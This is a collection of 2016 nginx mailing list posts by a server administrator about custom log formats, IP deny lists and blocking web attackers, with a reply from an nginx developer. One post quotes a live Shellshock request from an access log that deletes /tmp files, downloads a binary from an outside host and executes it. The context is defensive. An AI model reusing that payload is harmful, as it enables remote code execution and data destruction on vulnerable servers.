
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Problems with custom log file format

2016-08-21 Thread li...@lazygranch.com
Nginx 1.10.1,2 

FreeBSD 10.2-RELEASE-p18 #0: Sat May 28 08:53:43 UTC 2016


I'm using the "map" module to detect obvious hacking by detecting
keywords. (Yes, I know about Naxsi.) Finding the really dumb hacks is
easy. I give them a 444 return code with the idea being I can run a
script on the log file and block these IPs. (Yes, I know about swatch.)

My problem is the access.log doesn't get formatted all the time. I have
many examples, but this is representative. First group has 444 at the
start of the line (custom format). The next group uses the default
format.
--
444 111.91.62.144 - - [21/Aug/2016:09:31:50 +] "GET /wp-login.php HTTP/1.1" 
0 "-" "Mozilla/5.0 (Windows NT 6.1; WO
W64; rv:40.0) Gecko/20100101 Firefox/40.1" "-"
444 175.123.98.240 - - [21/Aug/2016:04:39:44 +] "GET /manager/html 
HTTP/1.1" 0 "-" "Mozilla/5.0 (Windows NT 5.1; r
v:5.0) Gecko/20100101 Firefox/5.0" "-"
444 103.253.14.43 - - [21/Aug/2016:05:43:15 +] "GET /admin/config.php 
HTTP/1.1" 0 "-" "python-requests/2.10.0" "-"
444 185.130.6.49 - - [21/Aug/2016:14:23:09 +] "GET 
//phpMyAdmin/scripts/setup.php HTTP/1.1" 0 "-" "-" "-"


176.26.5.107 - - [21/Aug/2016:09:43:20 +] "GET /wp-login.php HTTP/1.1" 444 
0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW
64; rv:40.0) Gecko/20100101 Firefox/40.1"
195.90.204.103 - - [21/Aug/2016:17:09:11 +] "GET /wordpress/wp-admin/ 
HTTP/1.1" 444 0 "-" "-"
--

I'm putting the return code first to simplify my scripting that I will
use to feed blocking in ipfw. 

My nginx.conf follows (abbreviated). The email may mangle the
formatting a bit.
-
http {

log_format  main  '$status $remote_addr - $remote_user [$time_local] 
"$request" '
  '$body_bytes_sent "$http_referer" '
  '"$http_user_agent" "$http_x_forwarded_for"';
access_log /var/log/nginx/access.log main 
---

___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Re: Hierarchy of malformed requests and blocked IPs

2016-07-30 Thread li...@lazygranch.com
On Sat, 30 Jul 2016 23:49:30 +0300
"Valentin V. Bartenev" <vb...@nginx.com> wrote:

> On Saturday 30 July 2016 10:52:46 li...@lazygranch.com wrote:
> > On Sat, 30 Jul 2016 13:18:47 +0300
> > "Valentin V. Bartenev" <vb...@nginx.com> wrote:
> > 
> > > On Friday 29 July 2016 23:01:05 li...@lazygranch.com wrote:
> > > > I see a fair amount of hacking attempts in the access.log. That
> > > > is, they 
> > > show up with a return code of 400 (malformed). Well yeah, they are
> > > certainly malformed. But when I add the offending IP address to my
> > > blocked list, they still show up as malformed upon subsequent
> > > readings of access.log. That is, it appears to me that nginx isn't
> > > checking the blocked list first.
> > > > 
> > > > If true, shouldn't the blocked IPs take precedence?
> > > > 
> > > > Nginx 1.10.1 on freebsd 10.2
> > > > 
> > > 
> > > It's unclear what do you mean by "my blocked list".  But if you're
> > > speaking about "ngx_http_access_module" then the answer is no, it
> > > shouldn't take precedence.  It works on a location basis, which
> > > implies that the request has been parsed already.
> > > 
> > >   wbr, Valentin V. Bartenev
> > > 
> > > ___
> > 
> > My "blocked IPs" are implemented as follows. In nginx.conf:
> > --
> > http {
> > include   mime.types;
> > include  /usr/local/etc/nginx/blockips.conf;
> > -
> > 
> > Tne format of the blockips.conf file:
> > --
> > #haliburton
> > deny 34.183.197.69 ;
> > #cloudflare
> > deny 103.21.244.0/22 ;
> > deny 103.22.200.0/22 ;
> > deny 103.31.4.0/22 ;
> > ---
> 
> The "deny" directive comes from ngx_http_access_module.
> 
> See the documentation:
> http://nginx.org/en/docs/http/ngx_http_access_module.html
>  
> 
> > 
> > Running "make config" in the nginx ports, I don't see
> > "ngx_http_access_module" as an option, nor anything similar.
> > 
> [..]
> 
> It's a standard module, which is usually built by default.
> 
> 
> > So given this set up, should the IP space in blockedips.conf take
> > precedence? 
> 
> No.
> 
> 
> > 
> > My thinking is this. If a certain IP (or more generally the entire
> > IP space of the entity) is known to be attempting hacks, why bother
> > to process the http request? I know I could block them in the
> > firewall, but blocking in the web server makes more sense to me.
> 
> Why bother to accept such connection at all?  There's no sense
> to accept connection in nginx and then discard it immediately.
> 
> In your case it should be blocked on the system level.
> 
>   wbr, Valentin V. Bartenev
> 
> ___

I can do the blocking in the firewall, but I could see a scenario where
a web hosting provider would want to do web blocking on a per domain
basis. That is, what one customer wants to be blocks will not be what
all customers want blocked. So it seems to me if the IP could be
checked first within nginx,there is value in that.

In my case, I only want to block web access, which I assume I can do
via the firewall. My point being the web server has a significantly
larger attack surface than email. So while I would want to block access
to my nginx server, I would allow email access from the same
"blocked" IP. After all, the user I blocked might want to email the
webmaster to inquire why they are blocked. Or there are multiple
domains at the same IP, and not everyone is a hacker. Eyeballs
generally come from ISPs and schools. Datacenters are not eyeballs,
Yeah, people surf from work, but if you block some corporate server
that has been attempting to hack your server, so be it. Email on the
other had DOES come from datacenters, so they shouldn't be blocked from
25.



___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Bash script; Was it executed?

2016-07-30 Thread li...@lazygranch.com
I see a return code of 200. Does that mean this script was executed?
-
219.153.48.45 - - [30/Jul/2016:07:40:07 +] "GET / HTTP/1.1" 200 643
"() { :; }; /bin/bash -c \x22rm -rf /tmp/*;ech o wget
http://houmen.linux22.cn:123/houmen/linux223 -O /tmp/China.Z-slma
>> /tmp/Run.sh;echo echo By China.Z >> /tmp/R un.sh;echo chmod
>> 777 /tmp/China.Z-slma >> /tmp/Run.sh;echo /tmp/China.Z-slma
>> >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod
>> >> 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c \x22rm
>> >> -rf /tmp/*;echo wget http://houmen
.linux22.cn:123/houmen/linux223 -O /tmp/China.Z-slma
>> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod
>> 777 /tmp/China.Z-slma >> /tmp/Run.sh;echo /tmp/China.Z-slma
>> >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 7
77 /tmp/Run.sh;/tmp/Run.sh\x22"
-

___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Re: Hierarchy of malformed requests and blocked IPs

2016-07-30 Thread li...@lazygranch.com
On Sat, 30 Jul 2016 13:18:47 +0300
"Valentin V. Bartenev" <vb...@nginx.com> wrote:

> On Friday 29 July 2016 23:01:05 li...@lazygranch.com wrote:
> > I see a fair amount of hacking attempts in the access.log. That is,
> > they 
> show up with a return code of 400 (malformed). Well yeah, they are
> certainly malformed. But when I add the offending IP address to my
> blocked list, they still show up as malformed upon subsequent
> readings of access.log. That is, it appears to me that nginx isn't
> checking the blocked list first.
> > 
> > If true, shouldn't the blocked IPs take precedence?
> > 
> > Nginx 1.10.1 on freebsd 10.2
> > 
> 
> It's unclear what do you mean by "my blocked list".  But if you're
> speaking about "ngx_http_access_module" then the answer is no, it
> shouldn't take precedence.  It works on a location basis, which
> implies that the request has been parsed already.
> 
>   wbr, Valentin V. Bartenev
> 
> ___

My "blocked IPs" are implemented as follows. In nginx.conf:
--
http {
include   mime.types;
include  /usr/local/etc/nginx/blockips.conf;
-

Tne format of the blockips.conf file:
--
#haliburton
deny 34.183.197.69 ;
#cloudflare
deny 103.21.244.0/22 ;
deny 103.22.200.0/22 ;
deny 103.31.4.0/22 ;
---

Running "make config" in the nginx ports, I don't see
"ngx_http_access_module" as an option, nor anything similar.

So given this set up, should the IP space in blockedips.conf take
precedence? 

My thinking is this. If a certain IP (or more generally the entire IP
space of the entity) is known to be attempting hacks, why bother to
process the http request? I know I could block them in the firewall,
but blocking in the web server makes more sense to me.

Here is an example from access.log for a return code of 400:
95.213.177.126 - - [30/Jul/2016:11:35:46 +] "CONNECT 
check.proxyradar.com:80 HTTP/1.1" 400 173 "-" "-"

I have the entire IP space of selectel.ru blocked since it is a source
of constant hacking. (Uh, no offense to the land of dot ru).







___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx